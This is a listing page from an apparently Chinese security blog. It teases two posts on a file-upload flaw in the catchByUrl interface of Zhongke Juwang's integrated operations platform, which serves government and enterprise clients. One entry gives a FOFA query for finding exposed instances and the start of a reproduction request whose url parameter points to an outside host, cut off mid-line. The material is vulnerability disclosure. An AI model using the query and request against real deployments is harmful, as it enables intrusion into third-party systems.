安全漏洞 北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞【附poc】 一、漏洞简述 北京中科聚网信息技术有限公司是一家致力于大中型网站建设、企业内部资源管理与大数据检索应用,获得了北京市专项资金扶植的软件企业。中科聚网为政府企业客户提供资源管理、数据检索应... 05月17日12 views评论文件上传漏洞 漏洞复现 阅读全文
安全漏洞 北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞 资产测绘 fofa: title="一体化运营平台" || body="thirdparty/ueditor/WordPaster" 漏洞复现 GET /*/*/*/*?url=http://fo1p... 05月07日68 views评论0day 文件上传漏洞 阅读全文